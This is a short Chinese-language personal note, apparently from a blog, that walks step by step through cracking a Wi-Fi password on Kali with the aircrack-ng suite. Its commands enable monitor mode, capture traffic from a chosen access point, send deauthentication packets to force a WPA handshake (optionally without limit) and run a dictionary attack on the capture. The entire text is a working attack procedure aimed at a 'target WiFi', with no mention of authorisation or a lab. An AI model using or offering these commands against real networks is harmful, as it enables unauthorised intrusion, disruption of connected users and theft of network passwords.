Kali:Aircrack破解無線網路詳解
- 2020 年 3 月 5 日
- 筆記
1.結束進程
airmon-ng check kill
2.載入網卡
airmon-ng start wlan0(自己的網卡名)
3.建立監聽
airodump-ng wlan0
4.模擬WiFi 訊號
airodump-ng --ivs -w wifi-passwd --bssid WiFi的MAC -c ch wlan0
–ivs :指定生成文件的格式,這裡格式是ivs(比如:abc.ivs)
-w :指定文件的名稱叫什麼,這裡叫wifi-pass
–bssid :目標WiFi的MAC地址
-c :指定我們模擬的WiFi的信道(ch)
5.攻擊目標
aireplay-ng -0 20 -a WiFi的MAC -c 客戶端的MAC wlan0
-0 :發送工具數據包的數量,這裡是20個(無限次攻擊改成0 )
-a :指定目標AP的MAC地址
-c :指定用戶的MAC地址,(正在使用WiFi的客戶端的MAC)
出現資訊(WPA handshake)密碼資訊抓取成功,抓取到的密碼默認保存在主目錄中
6.破解密碼文件
aircrack-ng wifi-passwd-01.ivs -w /mnt/hgfs/Share/word.txt
wifi-pass-01.ivs :密碼文件
-w : 指定密碼字典